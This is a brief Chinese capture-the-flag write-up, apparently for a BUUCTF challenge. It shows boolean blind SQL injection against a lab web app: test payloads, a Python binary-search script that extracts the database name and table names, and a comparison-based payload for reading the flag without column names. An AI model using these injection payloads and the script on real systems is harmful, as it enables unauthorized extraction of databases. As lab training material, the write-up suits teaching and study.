有相应的回显
可以对其进行盲注
长为507的是被过滤的
输入1&&(ascii(substr(database(),1,1))>32)#
成功回显则可用来盲注
借鉴大佬脚本
import requests
import time
url = 'http://a713b075-e461-480d-82a8-36c99d85f52e.node3.buuoj.cn'
i = 0
flag = ''
while True:
i += 1
begin = 32
end = 126
tmp = (begin + end) // 2
while begin < end:
#print(begin, tmp, end)
time.sleep(0.1)
payload = {"id":"1&&(ascii(substr(database(),%d,1))>%d)#" % (i, tmp)}
#payload = {"id":"1&&(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(sys.x$schema_flattened_keys)where(TABLE_SCHEMA=database())),%d,1))>%d)#" % (i, tmp)}
r = requests.post(url,data=payload)
if 'Nu1L' in r.text:
begin = tmp + 1
tmp = (begin + end) // 2
else:
end = tmp
tmp = (begin + end) // 2
flag += chr(tmp)
print(flag)
if begin == 32:
break
爆表
字段爆破用无列名爆破
1&&((select 1,'a') < (select * from f1ag_1s_h3r3_hhhhh))
比较首字符<就返回1反之返回0
前面select的字段有两个和后面的对应
payload = {"id":"1&&((select 1,'{}') < (select * from f1ag_1s_h3r3_hhhhh))".format(flag+chr(tmp))}
构建相应的脚本可爆出flag
这题好像每个人的flag都不一样有点骚